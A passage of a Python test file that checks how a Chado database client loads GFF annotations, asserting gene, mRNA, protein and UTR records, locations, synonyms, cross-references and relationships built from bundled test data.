# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
contigterm = self.ci.get_cvterm_id('contig', 'sequence')
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.filter_by(type_id=contigterm) \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
def test_load_gff_relranks(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
rels = mrna_f.object_in_relationships
locsorted_rels = []
for rel in rels:
if rel.type_id == partofterm:
locsorted_rels.append((rel.subject.featureloc_collection[0].fmin, rel.rank))
locsorted_rels = sorted(locsorted_rels, key=lambda x: x[0])
sorted_rels = sorted(locsorted_rels, key=lambda x: x[1])
assert locsorted_rels == sorted_rels, "children sorted correctly"
def test_load_gff_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True, add_only=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def test_load_gff_twice_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Adding twice the same gff with --add_only should raise some exception
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True)
try:
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True, add_only=True)
except Exception:
self.ci.session.rollback()
assert True
def test_load_gff_protein_id(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/ncbi.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], protein_id_attr="protein_id", no_seq_compute=True)
# CDS level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1537") \
.one()
assert rna_f.name == 'XM_008184899.2'
assert rna_f.uniquename == 'rna1537'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184899.2"
assert pep_f.uniquename == "XP_008183121.1"
# mRNA level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1539") \
.one()
assert rna_f.name == 'XM_008184894.2'
assert rna_f.uniquename == 'rna1539'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184894.2"
assert pep_f.uniquename == "some_prot_id"
def test_load_gff_nosource(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot_nosource.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 2, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
